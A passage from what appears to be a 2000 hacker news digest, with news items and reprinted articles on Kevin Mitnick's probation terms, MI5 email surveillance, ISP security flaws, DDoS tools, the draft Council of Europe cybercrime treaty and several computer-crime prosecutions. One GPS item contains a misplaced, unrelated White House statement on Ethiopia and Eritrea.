commentary for Time Magazine opining on the high-profile denial of service
attacks that briefly struck down some of the most widely used e-commerce
sites on the web. 'I'm helping to protect people from the very conduct
that I was once engaged in' -- Kevin Mitnick A disclaimer under his
article noted that it "should not be construed as technical advice of any
kind," a nod to special restrictions federal judge Marianna Pfaelzer
handed Mitnick as part of a 1997 sentence for cell phone fraud. Under that
ruling, Mitnick is not only banned for three years from using computers,
cell phones and the Internet, but he's barred from acting "as a consultant
or advisor to individuals or groups engaged in any computer related
activity," without the permission of the U.S. Probation Office.
Until this month, the Probation Office apparently didn't interpret that
broad order -- which was upheld by an appeals court in 1998 -- as an
obstacle to Mitnick's career ambitions.
"I wanted to work on a book," says Mitnick. "I wanted to work in these
speaking engagements and articles, and it was something that was
satisfying to me and something I could do" without using computers.
One source says that Mitnick had as much as $20,000 worth of speaking
engagements scheduled through August, when the April 12th decision put his
plans in limbo, and forced him to cancel a scheduled appearance last week
on an information security panel in Salt Lake City, Utah.
Brill's Discontent Mitnick said he warned organizers of the Utah
NetTrends 2000 computer conference from the start that his appearance
would hang on the Probation Office's approval, and he's miffed that a
press release issued by the conference incorrectly claimed that a last
minute court ruling caused the cancellation.
In addition to speaking engagements, Mitnick had been entertaining more
offers to write for a variety of newspapers, magazines and web sites, and
had agreed to author a monthly column for Contentville, an e-commerce site
set to begin reviewing and selling books and magazines this summer.
"I wanted Kevin to write about consumer computer magazines," said Michael
Hsu, the Contentville editor who recruited Mitnick. "His situation, where
he can't touch computers or use cell phones, is unique, and I thought he
could bring an interesting perspective.
"From what I've been told about it, [the restriction] doesn't make any
sense, and I think if he has the legal resources he should be able to
challenge it successfully," said Steven Brill, Editor in Chief of the
media watchdog magazine Brill's Content, and founder of Contentville.
Brill said it's one thing to prevent a defendant from profiting from his
crimes... "It's quite another thing to say he can't talk to anyone about
anything. It just doesn't make any sense," said Brill, who still holds
some hope that Mitnick will be writing for Contentville. "If he is not
going to be able to do it, I'd be very disappointed,"
"The government can impose any restrictions so long as they are reasonably
related to sentencing goals, and are no more restrictive then necessary,"
says Eugene Volokh, a UCLA Law School professor and expert in First
Amendment issues. "Off the top of my head, it's hard for me to imagine how
banning him from writing about computer magazines is consistent with those
goals. But I haven't heard the probation officer's point of view"
Reginald Valencia, Supervising United States Probation Officer, said
office confidentiality rules prevent him from commenting on the case. "Not
in any shape manner or form could I discuss it," said Valencia.
Volokh notes that sentencing judges and probation officers are generally
afforded great discretion in imposing supervision restrictions.
Mitnick acknowledges his chances are poor if he takes his fight up to the
appellate courts, but he adds that he and his new attorney, Los Angeles
criminal defense lawyer Sherman Ellison, don't plan on entering Judge
Pfaelzer's courtroom sprouting case law and statutes.
"I'm helping to protect people from the very conduct that I was once
engaged in," said Mitnick. "We're going to go in there and explain to the
judge that this is good for the public and good for my rehabilitation."
@HWA
131.0 [HNN] MI5 To Build Email Eavesdropping Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Weld Pond
British security agency MI5 will be constructing a 25m email
surveillance center to monitor all emails sent and received in
Britain. While law enforcement will still need Home Office approval to
actually read emails and other messages officials say the center is
need in the fight against online crime. the new center will be called
GTAC, Government Technical Assistance Centre and will be operational
by the end of the year.
Sunday Times
http://www.sunday-times.co.uk/news/pages/sti/2000/04/30/stinwenws01034.html
MI5 builds new centre to read e-mails on the net
Nicholas Rufford
MI5 is building a new �25m e-mail surveillance centre that will have the
power to monitor all e-mails and internet messages sent and received in
Britain. The government is to require internet service providers, such as
Freeserve and AOL, to have "hardwire" links to the new computer facility
so that messages can be traced across the internet. The security
service and the police will still need Home Office permission to search
for e-mails and internet traffic, but they can apply for general warrants
that would enable them to intercept communications for a company or an
organisation.
The new computer centre, codenamed GTAC - government technical assistance
centre - which will be up and running by the end of the year inside MI5's
London headquarters, has provoked concern among civil liberties groups.
"With this facility, the government can track every website that a person
visits, without a warrant, giving rise to a culture of suspicion by
association," said Caspar Bowden, director of the Foundation for
Information Policy Research.
The government already has powers to tap phone lines linking computers,
but the growth of the internet has made it impossible to read all
material. By requiring service providers to install cables that will
download material to MI5, the government will have the technical
capability to read everything that passes over the internet.
Home Office officials say the centre is needed to tackle the use of the
internet and mobile phone networks by terrorists and international crime
gangs.Charles Clark, the minister in charge of the spy centre project,
said it would allow police to keep pace with technology.
"Hardly anyone was using the internet or mobile phones 15 years ago," a
Home Office source said. "Now criminals can communicate with each other by
a huge array of devices and channels and can encrypt their messages,
putting them beyond the reach of conventional eavesdropping."
There has been an explosion in the use of the internet for crime in
Britain and across the world, leading to fears in western intelligence
agencies that they will soon be left behind as criminals abandon the
telephone and resort to encrypted e-mails to run drug rings and illegal
prostitution and immigration rackets.
The new spy centre will decode messages that have been encrypted. Under
new powers due to come into force this summer, police will be able to
require individuals and companies to hand over computer "keys", special
codes that unlock scrambled messages.
There is controversy over how the costs of intercepting internet traffic
should be shared between government and industry. Experts estimate that
the cost to Britain's 400 service providers will be �30m in the first
year. Internet companies say that this is too expensive, especially as
many are making losses.
About 15m people in Britain have internet access. Legal experts have
warned that many are unguarded in the messages they send or the material
they download, believing that they are safe from prying eyes.
"The arrival of this spy centre means that Big Brother is finally here,"
said Norman Baker, Liberal Democrat MP for Lewes. "The balance between the
state and individual privacy has swung too far in favour of the state."
@HWA
132.0 [HNN] French ISP Wannado Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Thiebaut
French ISP Wannado has linked its web based email system to the IP
address of its users allowing them to read email online without
requiring a password. A simple proxy server will of course allow an
intruder to masquerade his IP address and read anyones mail. There are
more than 1.5 million persons that are accessing the internet with
Wanadoo. This vulnerability has existed for over a month with no
resolution. France Telecom, owners of Wanndo, have said the issue
concerns very few users and therefore have refused to correct the
problem.
Le Virus Informatique
http://www.acbm.com/wan.html
@HWA
133.0 [HNN] Russia Arrests 55 in Credit Card Scheme
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by William Knowles
Police in Moscow have arrested five people involved in an elaborate
credit card scheme. The group allegedly set up a fake business with a
credit card merchant account called Politshop. Then members of group
raided e-commerce vendors and placed fraudulent charges onto victims
cards from Politshop. ITAR-TAS reports that $630,000 was stolen but
does not indicate how they where caught.
Associated Press - via Tampa Bay Online
http://ap.tbo.com/ap/breaking/MGII9EK5M7C.html
Url kicked the bit bucket
@HWA
134.0 [HNN] BTopenworld Suffers Information Leakage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by mr.big23
BTopenworld has suffered a security leak or glitch that has published
names, addresses, e-mail addresses, salary details and other personal
information from consumers and business people interested in BT's ADSL
products. Supposedly over three megabytes of customer data was left
wide open containing the personal information of thousands of users.
BTopenworld has since closed the hole and has stopped accepting
additional sign ups.
The Register UK
http://www.theregister.co.uk/000427-000028.html
Url croaked on a chicken bone
@HWA
135.0 [HNN] Nmap 2.5 Released
~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by fyodor
The popular network scanning tool Nmap has finally come out of beta
and released version 2.5. It supports ping scanning , many port
scanning techniques, and TCP/IP fingerprinting. Nmap also offers
flexible target and port specification, decoy scanning, determination
of TCP sequence predictability characteristics, sunRPC scanning,
reverse-identd scanning, and more. Console and X-Window versions are
available in source or binary form. (Best of all it is free.)
Insecure.org
http://www.insecure.org/stf/Nmap-2.50-Release.html
@HWA
136.0 [HNN] Washington State Announces CLEW Agreement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by William Knowles
The Washington state Attorney General Christine Gregoire, has
announced the Computer Law Enforcement of Washington agreement. The
agreement will allow federal, state, and local agencies to team up to
combat cyber crimes in the Pacific Northwest. Now that the agreement
has been signed the group will seek $2 million from taxpayers through
the U.S. Department of Justice and the Treasury to equip and expand
the program.
Wired
http://www.wired.com/news/politics/0,1283,35970,00.html
Northwest's Plans vs. Cybercrime by Manny Frishberg 3:00 a.m. Apr. 28,
2000 PDT
SEATTLE -- Federal, state, and local agencies are teaming up to combat
cybercrimes in the Pacific Northwest, hoping that the joint effort will
prove stronger than the abilities of individual agencies, whose resources
frequently are dwarfed by the magnitude of their challenges.
Washington state Attorney General Christine Gregoire, who announced the
program Thursday, said she hoped it would serve as a model for law
enforcement agencies around the country.
The CLEW agreement, or Computer Law Enforcement of Washington, was signed
by the heads of the respective agencies in early March, but was not made
public until Gregoire's press conference Thursday.
The program will streamline efforts to combat Internet crimes, said U.S.
Attorney Kate Pflaumer, adding that a lag in technological resources only
adds to cooperation problems between states and countries.
"The Internet does not recognize state or even national political
boundaries, so cooperation between law enforcement is imperative," she
said.
Starting with an agreement to cooperate and share existing resources,
Gregoire said the agencies will seek $2 million from the U.S. Department
of Justice and the Treasury to equip and expand the program.
In addition to providing computers and technicians who can tease data out
of computer systems and hard drives, the program will train law
enforcement personnel to seize computers and components using methods that
preserve their data.
Gregoire, flanked by the area's U.S. attorney, the head of the local FBI
office and the Tacoma city attorney, said she's pressing Congress to pass
legislation that would clarify where a crime has been committed when a Web
server is in one state and the person accessing the system is in another.
The group also hopes to establish uniform rules for getting search
warrants for Internet-based and computer data that would be respected by
all the states, so that a search warrant from Washington state could be
used to seize a server in Arizona, said Pierce County Prosecuting Attorney
John Landenburg.
With the Anarchist Cookbook home page projected onto a screen behind her,
Gregoire launched into a set of statistics to illustrate the scale of the
problem.
Eighty-five percent of all Internet bulletin board traffic is dedicated to
hacking, software piracy, or sex, Gregoire said, citing a New York Times
article.
In a recent FBI study of Fortune 500 companies, reported losses from
computer crime between 1997 and 1999 exceeded $360 million, and 62 percent
of those companies reported a computer security breach within the last
year, she added.
Landenburg, who's assembled a computer forensics lab for his area, said he
was concerned that 37 out of 38 jurisdictions in the state don't have the
resources to follow Tacoma's lead.
Landenburg said he still has problems keeping up with the pace of change
in the computer industry. "Every year we have to go out and replace our
equipment" to match that of the people the lab is investigating, he said.
In another component to the program, the University of Washington will
help out with a new Web-based center to handle consumer complaints and
mediate e-commerce disputes, Gregoire said.
@HWA
137.0 [HNN] New York Times Links to DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Macki
The New York Times has linked directly to the 2600 list of sites which
currently house the DeCSS code. This action is similar to that for
which the MPAA is currently suing several webs sites.
2600
New York Times
http://www.2600.com/news/2000/0428.html
http://www10.nytimes.com/library/tech/00/04/cyber/cyberlaw/28law.html
@HWA
138.0 [HNN] More E-zines
~~~~~~~~~~~~~~~~~~
May 1st
contributed by xellent55 and k-rad-bob
b0g has released its fourth issue. SWAT Magazine, the UK's longest
running underground magazine, has released issue 28.
b0g
Swat Team
http://www.b0g.org
http://www.swateam.org
139.0 [HNN] mStream Joins Trinoo, TFN and Stacheldraht
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by William Knowles
A new tool has joined the ranks of the old standbys in distributed DoS
attacks. Now not only is their Trinoo, TFN and Stacheldraht tools
there is mStream. mStream was recently discovered on a compromised
Linux system in the wild. Initial analysis shows the program to be in
the early stages of development however it has the potential to be
much more powerful than existing tools.
C|Net
Security Focus - Source code analysis of mStream
http://news.cnet.com/news/0-1003-200-1798064.html?tag
http://www.securityfocus.com/templates/archive.pike?list
@HWA
140.0 [HNN] Phrack 56 Released
~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by wizdumb
One of the oldest and most respected underground e-zines has released
its 56th issue. Phrack 56 has articles on Bypassing StackGuard and
StackShield, Smashing C++ VPTRs, Anomaly Detection Model for IDS and
much much more with all you old favorite columns like Loopback and
Line Noise. (OK, who remembers what line noise rea*ly %ad*&% >< {|]!~
~!!)
Phrack
http://www.phrack.com/
@HWA
141.0 [HNN] Tech Crimes Get Double Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by acopalyse
The U.S. Sentencing Commission has sent guidelines to Congress that
would substantially increase penalties for such crimes as credit card
and identity theft, using computers to solicit or sexually exploit
minors and violating copyrights or trademarks online. The new
guidelines would effectively double many of the existing penalties.
The guidelines are slated to take effect November 1, 2000.
MSNBC
http://www.msnbc.com/news/401964.asp
Dead url
@HWA
142.0 [HNN] Numbers Numbers Who has the Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by root66
So how many attempted cyber attacks do DOD computers fend off each
year? Depends on who you listen to and what you call an attack I
guess. It would appear that some officials don't know the difference
between a network query and an attempted intrusion. It would seem from
the numbers that attacks (network queries, intrusions, ???) against
DOD ranged somewhere between 58 and 250,000 for 1999.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0501/intercepts-05-01-00.asp
Intercepts BY Dan Verton 05/01/2000 The Hacker Equation
My mobile listening posts have discerned a confusing pattern of reports on
the number of hacker "attacks" launched against the Defense Department
each year.
It started out simple enough: Early last year, Air Force Maj. Gen. John
"Soup" Campbell, commander of the Joint Task Force for Computer Network
Defense, placed the number of "attacks" against DOD networks at 250,000
each year.
But in November 1999, Lt. Gen. David Kelley, director of the Defense
Information Systems Agency, talked about a 300 percent increase in the
number of "unauthorized intrusions."
Intrusions skyrocketed, according to Kelley, from 5,844 in 1998 to 18,433
through November 1999. (Campbell reported last week that this number
topped off at 22,144 for all of 1999.)
This year the numbers got more complicated. In March, Lt. Col. LeRoy
Lundgren, program manager for the Army�s National Security Improvement
Program, said the Army alone denied as many as 285,000 network queries
last year because of questionable methods used in the queries. The
Interceptor guesses "network queries" are somehow similar to "attacks."
Enter the Justice Department. According to Justice, the number of hacking
cases throughout the government nearly doubled last year, reaching 1,154,
up from 547 in 1998. One look at these numbers and you have to wonder if
these guys even know that DOD is part of the federal government.
Then, of course, there are "incidents" and "intrusions" to deal with. Lt.
Gen. William Campbell, the Army�s chief information officer, last week
told a crowd at the Association of the U.S. Army�s annual symposium on
information assurance and battlefield visualization that the Army
experienced 3,077 "incidents" during fiscal 1999 and 58 "intrusions." For
fiscal 2000, those numbers had reached 2,230 and 40, respectively, by
April 4.
But "Soup" Campbell told the same crowd that in fiscal 1998 a total of
5,844 incidents were reported to the Pentagon by DOD commands. In fiscal
1999, that number reached 22,144, and during the first three months of
this year, that number had already surpassed 5,993, Campbell said.
Confused? I am.
Serving Campbell Soup at the CIA
"Soup" Campbell told the Interceptor last week that he�s received orders
to report in June to CIA headquarters, where he will take over as the
director of military support. Speaking at the AUSA symposium, Campbell
also said the JTF-CND recently added legal counsel to its official
structure.
"I never thought I�d need a lawyer to do my business," Campbell said,
referring to the lack of legal guidelines governing computer network
attack and defense.
Hey, don�t knock it, Soup. Legal counsel is highly underrated in this
world of error-prone databases and outdated hard-copy maps.
Fortunately, I hear that there�s no shortage of lawyers in Langley, Va.
Go West, Young Man
My E-Ring listening post in the heart of the Pentagon has picked up
several low-level signals indicating that Paul Brubaker, the Defense
Department�s acting deputy chief information officer, plans to leave his
position in a matter of weeks.
A strong supporter of the Navy/Marine Corps Intranet proposal, Brubaker
has apparently succumbed to "dot-com fever," according to sources, and
will be zapping himself out to the West Coast after he checks out of DOD.
One N/MCI insider said he hoped the move "is not a harbinger of the
future" for the beleaguered program.
Intercept something? Send it to the Interceptor at antenna@fcw.com.
@HWA
143.0 [HNN] Password Thief in Hong Kong Behind Bars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by Evil Wench
Cheng Tsz-chung, 22 was behind bars last night after changing the
password on another users account and then demanding HK$500 to change
it back. The victim paid the money and then contacted police. It is
unknown how Police tracked down Mr. Cheng. He has pleaded guilty to
one charge of unauthorized access to a computer and two counts of
theft. The magistrate remanded Cheng in custody and said his sentence,
which will be handed down on May 10 pending reports, must have a
deterrent effect. Cheng's lawyer told the Magistrate that his client
committed the offenses "just for fun". (The just for fun defense?
That's a new one.)
South China Morning Post
http://www.technologypost.com/internet/DAILY/20000427134721295.asp?Section
Published on Thursday, April 27, 2000 INTERNET
Hacker demanded HK$500 for chatroom password ELAINE PAK LI
--------------------------------------------------------------------------
------ A computer hacker was behind bars last night after breaking into a
man's on-line chatroom account, changing his password and demanding HK$500
to change it back. When Lee Kei, 21, found that his account's password had
been changed by computer technician Cheng Tsz-chung in July last year, he
opened another account to enter the chatroom and discuss the matter with
the hacker, Eastern Court heard.
During their on-line exchanges, Cheng, 22, tested Mr Lee's computer
knowledge by asking him several complicated questions, none of which Mr
Lee could answer, the court heard.
Cheng then refused to release Mr Lee's account, instead offering to sell
it back to him. The victim deposited $500 into Cheng's bank account the
next day and reported the matter to police.
Cheng was arrested in March when he was coincidently stopped and searched
by a police officer in Tsim Sha Tsui, the court heard.
He pleaded guilty to one charge of unauthorised access to a computer and
two counts of theft.
Cheng's lawyer told Magistrate Ian Candy that his client, who had no
previous criminal record, committed the offences "just for fun".
Mr Candy said: "Not only did you break into another person's account and
use it yourself, you even asked for money when you were discovered."
The magistrate remanded Cheng in custody and said his sentence, which will
be handed down on May 10 pending reports, must have a deterrent effect.
@HWA
144.0 [HNN] FMA and SM Release CD
~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by Nick
Freaks Macintosh Archives and Secure Mac have teamed up to create the
most up to date CD filled with Macintosh security and hacking related
tools in existence. The CD combines the old Whacked Mac Archives with
the new archives of Securemac.com and freaky.staticusers.net. All for
only $20.
Secure Mac
Freaks Macintosh Archives
http://www.securemac.com/securemacfma.html
http://freaky.staticusers.net/
@HWA
145.0 [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Rapier311
Metallica claims that it has discovered the names of 335,435
individuals who have used Napster to trade their songs. The band hired
'NetPD' to do the research over the weekend to come up with the names.
Metallica plans to offer the names to Napster first before adding them
into the lawsuit. (Be interesting to know how NetPD came up with that
list and how accurate it is.)
C|Net
http://technews.netscape.com/news/0-1005-200-1798138.html?tag
@HWA
146.0 [HNN] President Sets GPS to Full Force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Maggie
The Global Positioning System has been purposely crippled for civilian
use since its inception. Now president Clinton has decided that
civilians should get the same use of GPS as the military by disabling
the degradation of the signal or Selective Availability. Degradation
of the civilian signal was originally to prevent foreign nations from
having the same advantage as us but the US has demonstrated the
capability to selectively deny GPS signals on a regional basis during
times of conflict so the Selective Availability is no longer
necessary. The removal of Selective Availability will increase
Civilian GPS accuracy from 100 to 10 or 20 meters. (Wow, this should
mean some real cool GPS products should hit the market soon.) the
White House
Federal Computer Week
http://www.whitehouse.gov/library/PressReleases.cgi?date
http://www.fcw.com/fcw/articles/2000/0501/web-gps-05-02-00.asp
June 18, 2000
STATEMENT BY THE PRESIDENT
Forwarded by Megan C. Moloney/WHO/EOP on 06/18/2000
09:07 AM
Megan C. Moloney
06/18/2000 09:07:12 AM
Record Type: Record
To:
cc:
Subject: Statement by the President: Ethiopia and Eritrea
THE WHITE HOUSE
Office of the Press Secretary
For Immediate Release June 18, 2000
STATEMENT BY THE PRESIDENT
Today in Algiers, Ethiopia and Eritrea signed an agreement to cease
hostilities. This is a breakthrough which can, and should end the tragic
conflict in the Horn of Africa. It can, and should permit these two
countries to realize their potential in peace, instead of squandering it in
war.
I commend the Organization of African Unity, and especially its chair
Algerian President Abdelaziz Bouteflika, for leading the negotiation of
this agreement. I am grateful to my envoy, former National Security
Advisor Anthony Lake, to Assistant Secretary of State Susan Rice and to my
senior advisor on African Affairs Gayle Smith for their tireless pursuit of
a peaceful resolution to this conflict. The United States has supported
the OAU in this effort and we will continue to do so. I have asked Tony
Lake to return to Algiers to work with the OAU as we enter the next round
of negotiations.
I hope this commitment by Ethiopia and Eritrea to stop the fighting also
signals their commitment to build the peace. I urge them to use the next
round of talks to produce a final, comprehensive, lasting agreement, so
they can get on with the work of pursuing democracy and development for
their people. Ethiopia and Eritrea are America?s friends. If they are
ready to take the next step, we and our partners in the international
community will walk with them.
# # #
Civil GPS accuracy boosted BY Paula Shaki Trimble
What is GPS?
GPS is a system of at least 24 orbiting satellites operated by the Defense
Department that provides accurate positioning and timing information to
users on the ground, in the air or in space. GPS is used to guide
missiles, navigate civilian aircraft and time cellular communications
handoffs from one base station to another.
05/02/2000 President Clinton on Monday delivered on a 4-year-old promise
to improve the accuracy of the Global Positioning System to civil users.
In a presidential directive in 1996, Clinton promised to revisit the issue
of intentionally degrading the civil GPS signal in 2000. He had promised
to discontinue use of the degradation capability � known as selective
availability � by 2006, with an annual assessment of its continued use
beginning this year.
Selective availability was deactivated at midnight on Monday, the
president�s science adviser, Neal Lane, announced during a press briefing
earlier in the day.
The decision came early because the Defense Department has sufficiently
proven its ability to deny the GPS signal to adversaries in a specific
region while maintaining availability to users elsewhere, said Arthur
Money, the Pentagon�s assistant secretary of Defense for command, control,
communications and intelligence.
Selective availability caused the civil GPS signal to be accurate within
100 meters. Without selective availability, users will receive position
information accurate within 10 to 20 meters.
While the modification significantly improves the accuracy of the GPS
signal, the Transportation Department is still committed to developing
systems that augment the GPS capability, said Eugene Conti, assistant
secretary of Transportation for transportation policy. Those systems, such
as the Federal Aviation Administration�s Wide-Area Augmentation System and
Local-Area Augmentation System and the Coast Guard�s National Differential
GPS System, verify that the GPS signal is reliable.
@HWA
147.0 [HNN] New Cyber Crime Treaty Making the Rounds
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Evil Wench
The 'Draft Convention on Cybercrime', written in part by US law
enforcement is currently circulating among 40 countries for approval.
If enacted the proposal would make software designed or adapted to
gain access to a computer system without permission illegal,
interference with the 'functioning of a computer system' by deleting
or altering data, force people to give up their encryption keys, and
require ISPs to collect info about their users.
Wired
Draft Convention on Cybercrime
http://www.wired.com/news/politics/0,1283,36047,00.html
http://www.politechbot.com/docs/treaty.html
Cybercrime Solution Has Bugs by Declan McCullagh 3:00 a.m. May. 3, 2000
PDT
WASHINGTON -- U.S. and European police agencies will receive new powers to
investigate and prosecute computer crimes, according to a preliminary
draft of a treaty being circulated among over 40 nations.
The Council of Europe's 65KB proposal is designed to aid police in
investigations of online miscreants in cases where attacks or intrusions
cross national borders.
But the details of the "Draft Convention on Cybercrime" worry U.S. civil
libertarians. They warn that the plan would violate longstanding privacy
rights and grant the government far too much power.
The proposal, which is expected to be finalized by December 2000 and
appears to be the first computer crime treaty, would:
Make it a crime to create, download, or post on a website any computer
program that is "designed or adapted" primarily to gain access to a
computer system without permission. Also banned is software designed to
interfere with the "functioning of a computer system" by deleting or
altering data.
Allow authorities to order someone to reveal his or her passphrase for an
encryption key. According to a recent survey, only Singapore and Malaysia
have enacted such a requirement into law, and experts say that in the
United States it could run afoul of constitutional protections against
self-incrimination.
Internationalize a U.S. law that makes it a crime to possess even digital
images that "appear" to represent children's genitals or children engaged
in sexual conduct. Linking to such a site also would be a crime.
Require websites and Internet providers to collect information about their
users, a rule that would potentially limit anonymous remailers.
U.S. law enforcement officials helped to write the document, which was
released for public comment last Thursday, and the Justice Department is
expected to urge the Senate to approve it next year. Other non-European
countries actively involved in negotiations include Canada, Japan, and
South Africa.
During recent testimony before Congress, Attorney General Janet Reno
warned of international computer crime, a claim that gained more
credibility last month with the arrest of alleged denial-of-service
culprit Mafiaboy in Canada.
"The damage that can be done by somebody sitting halfway around the world
is immense. We have got to be able to trace them, and we have made real
progress with our discussions with our colleagues in the G-8 and in the
Council of Europe," Reno told a Senate appropriations subcommittee in
February, the week after the denial-of-service attacks took place.
"Some countries have weak laws, or no laws, against computer crimes,
creating a major obstacle to solving and to prosecuting computer crimes. I
am quite concerned that one or more nations will become 'safe havens' for
cyber-criminals," Reno said.
Civil libertarians say the Justice Department will try to pressure the
Senate to approve the treaty even if it violates Americans' privacy
rights.
"The Council of Europe in this case has just been taken over by the U.S.
Justice Department and is only considering law enforcement demands," says
Dave Banisar, co-author of The Electronic Privacy Papers. "They're using
one more international organization to launder U.S. policy."
Banisar says Article 6 of the measure, titled "Illegal Devices," could ban
commonplace network security tools like crack and nmap, which is included
with Linux as a standard utility. "Companies would be able to criminalize
people who reveal security holes about their products," Banisar said.
"I think it's dangerous for the Internet," says Barry Steinhardt,
associate director of the American Civil Liberties Union and a founder of
the Global Internet Liberty Campaign. "I think it will interfere with the
ability to speak anonymously."
"It will interfere with the ability of hackers -- using that term in a
favorable light -- to test their own security and the security of others,"
Steinhardt said.
Solveig Singleton, director of information studies at the libertarian Cato
Institute says it's likely -- although because of the vague language not
certain -- that anonymous remailers will be imperiled.
The draft document says countries must pass laws to "ensure the
expeditious preservation of that traffic data, regardless whether one or
more service providers were involved in the transmission of that
communication." A service provider is defined as any entity that sends or
receives electronic communications.
Representing the U.S. in the drafting process is the Justice Department's
Computer Crime and Intellectual Property section, which chairs the G-8
subgroup on high-tech crime and also is involved with a cybercrime project
at the Organization of American States. In December 1997 Reno convened the
first meeting on computer crime of the G-8 nations.
A recent White House working group, which includes representatives from
the Justice Department, FBI, and Secret Service has called for
restrictions on anonymity online, saying it can provide criminals with an
impenetrable shield. So has a report from a committee of the European
Parliament.
Other portions of the treaty include fairly detailed descriptions of
extradition procedures and requirements for countries to establish
around-the-clock computer-crime centers that police groups in other
countries may contact for immediate help.
The Council of Europe is not affiliated with the European Union, and
includes over 40 member nations, including Russia, which joined in 1996.
After the Council of Europe's expert group finalizes the proposed treaty,
the full committee of ministers must adopt the text. Then it will be sent
to countries for their signatures. Comments can be sent to daj@coe.int.
@HWA
148.0 [HNN] Vulnerabilities Found in FileMaker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by acopalyse
FileMaker Pro 5 database package has security flaws in the Web
Companion software. This flaw allows Internet users to view the
contents of online Web Companion databases and access the plug-in's
e-mail functions without authorization. A third flaw allows
unauthorized users to send anonymous or impersonated e-mail. FileMaker
says that no customers have yet complained about this problem.
MacWeek
http://macweek.zdnet.com/2000/04/30/0501fmresponds.html
Monday, May 1, 2000 FileMaker admits security flaws FileMaker on Monday
issued a statement confirming security flaws in the Web Companion software
that's part of the company's FileMaker Pro 5 database package. The flaws,
first reported by software developer Blue World Communications, make it
possible for Internet users to view the contents of online Web Companion
databases and access the plug-in's e-mail functions without authorization.
A third flaw allows unauthorized users to send anonymous or impersonated
e-mail.
Web Companion is a plug-in that allows users to post FileMaker databases
on the Web.
"At this point, we know of no customers who have experienced problems due
to these issues, and these issues only concern users publishing FileMaker
databases via our Web Companion," FileMaker public relations manager Kevin
Mallon said in the statement. "But because the security of our customers'
data is and always has been an overriding priority at FileMaker, we are
committed to sharing what we know quickly and accurately.
"More importantly, we intend to fully investigate and address any bugs as
quickly as possible. Resolving these issues is a top priority for
FileMaker."
Mallon wrote that "some technologies in the Web Companion may
inappropriately expose field contents which the user thinks are protected
by Field-Level Security. FileMaker intends to address this problem as soon
as possible."
Until FileMaker issues a fix, he said that users be aware that Field-Level
Security may not be reliable, and suggested alternative security schemes,
such as password protection in FileMaker or Function-Level Security in the
Web Security Database.
Mallon advised Web administrators concerned about the e-mail flaw to
activate Web Companion's Logging feature--accessed through Preferences--to
track requests sent to the plug-in. "This is a good general practice in
any case," he wrote.
Blue World said that customers can set up the company's Lasso Web Data
Engine as a secure proxy for Web Companion databases, allowing use of
Lasso's security features to restrict access. Other alternatives include
disabling Web Companion or using an earlier version of FileMaker.
@HWA
149.0 [HNN] Internet Threat gets Four Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Code Kid
A 18 year old student has been sentenced to four months in jail for
issuing a threat over the Internet. Michael Ian Campbell had pleaded
guilty last February to 'transmitting a threat of violence' against
Columbine High School via an Internet chat room. is lawyer attempted a
novel defense based on 'Internet intoxication.' (Yes, Columbine was a
tragedy but if this threat had been made face to face I'd bet no one
would have even taken it seriously let alone arrest the guy and give
him four months.)
Newsbytes - via Computer User
http://www.currents.net/news/00/05/02/news2.html
Daily News Teen Sentenced in Columbine Web Threat By Martin Stone,
Newsbytes May 02, 2000
A judge in Denver has reportedly handed down a four-month prison sentence
to an 18-year-old Florida man convicted of sending a chat-room message
threatening violence at Columbine High School, scene of a shooting spree
last year which claimed 15 lives.
A Reuters report Monday said the teen, Michael Ian Campbell, collapsed in
the courtroom after being handed the sentence. Campbell pleaded guilty in
February to "transmitting a threat of violence" across state lines. His
lawyer attempted a novel defense based on "Internet intoxication."
The report said a Columbine student, 16-year-old Erin Walton, was in a
chat room on Dec. 15 when Campbell told her to stay away from school the
next day because he planned to "finish what begun," which authorities
argued made a clear reference to the massacre and led school officials to
cancel classes for two days.
Campbell is reported to be suffering from depression and had attempted
suicide following his arrest at his Florida home after officials at
America Online helped police trace the origin of the message. He has since
apologized for the episode, and prosecutors had recommended a light
sentence. But, the judge maintained that though he could have given
Campbell probation or a sentence of up to six months, he felt the
four-month sentence would serve as a deterrent to others, the report said.
Reported By Newsbytes.com, http://www.newsbytes.com .
@HWA
150.0 [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by root66
Kevin Sills, a police officer in New York City, was charged that
between 1996 and 1998, Mr. Sills possessed software that was
programmed to intercept alphanumeric pager messages -- a violation of
�2512(1)(b) of the Electronics Communications Privacy Act. It also
charged Mr. Sills with violating �2511(1)(a) of the act by
intercepting such messages. Mr. Sills claimed that since there was
dissemination of the interception, either for profit or other reasons,
